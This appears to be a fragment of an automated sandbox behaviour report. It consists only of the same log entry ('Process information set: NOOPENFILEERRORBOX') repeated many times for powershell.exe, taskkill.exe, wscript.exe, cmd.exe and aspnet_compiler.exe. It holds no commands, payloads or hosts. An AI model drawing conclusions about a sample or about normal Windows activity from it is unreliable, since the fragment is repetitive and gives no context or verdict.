                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
